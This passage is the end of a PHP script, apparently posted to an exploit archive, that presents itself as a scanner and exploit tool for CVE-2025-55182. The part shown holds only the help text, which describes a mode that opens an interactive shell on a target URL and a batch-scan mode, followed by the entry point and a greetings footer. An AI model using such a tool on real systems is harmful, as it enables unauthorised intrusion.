$this->print_success("All required functions available");
}
$this->print_info("Self-test completed.");
}
private function show_help() {
echo $this->color('BOLD') . "CVE-2025-55182 Enhanced Scanner & Exploit Tool" . $this->color('ENDC') . PHP_EOL;
echo $this->color('CYAN') . "Version: 2.0 | Enhanced Security Edition" . $this->color('ENDC') . PHP_EOL . PHP_EOL;
echo "Usage:" . PHP_EOL;
echo " php " . basename(__FILE__) . " [mode] [options]" . PHP_EOL . PHP_EOL;
echo "Modes:" . PHP_EOL;
echo " scan - Check target vulnerability (detailed analysis)" . PHP_EOL;
echo " exploit - Interactive exploit shell (requires vulnerable target)" . PHP_EOL;
echo " test - Run self-test to verify functionality" . PHP_EOL;
echo " help - Show this help message" . PHP_EOL . PHP_EOL;
echo "Scan Options:" . PHP_EOL;
echo " -u URL - Single target URL (detailed scan)" . PHP_EOL;
echo " -f FILE - File containing list of URLs (batch scan)" . PHP_EOL . PHP_EOL;
echo "Exploit Options:" . PHP_EOL;
echo " -u URL - Target URL to exploit (interactive shell)" . PHP_EOL . PHP_EOL;
echo "Security Features:" . PHP_EOL;
echo " • Command length limitation (max 200 chars)" . PHP_EOL;
echo " • Dangerous command blocking" . PHP_EOL;
echo " • Confidence-based vulnerability detection" . PHP_EOL;
echo " • Safe mode for interactive shell" . PHP_EOL . PHP_EOL;
echo "Examples:" . PHP_EOL;
echo " php " . basename(__FILE__) . " scan -u https://target.com/api" . PHP_EOL;
echo " php " . basename(__FILE__) . " scan -f targets.txt" . PHP_EOL;
echo " php " . basename(__FILE__) . " exploit -u https://target.com/api" . PHP_EOL;
echo " php " . basename(__FILE__) . " test" . PHP_EOL;
echo $this->color('WARNING') . PHP_EOL . "[!] Legal Notice: For authorized testing only!" . $this->color('ENDC') . PHP_EOL;
echo $this->color('FAIL') . "[!] By using this tool, you accept full responsibility for your actions." . $this->color('ENDC') . PHP_EOL;
}
}
// Script entry point: only runs when this file is the CLI script being executed,
// not when it is included from another file.
$invoked_directly = PHP_SAPI === 'cli'
    && isset($argv[0])
    && basename($argv[0]) === basename(__FILE__);

if ($invoked_directly) {
    $scanner = new CVE_2025_55182_Scanner_Secure();
    $scanner->run();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================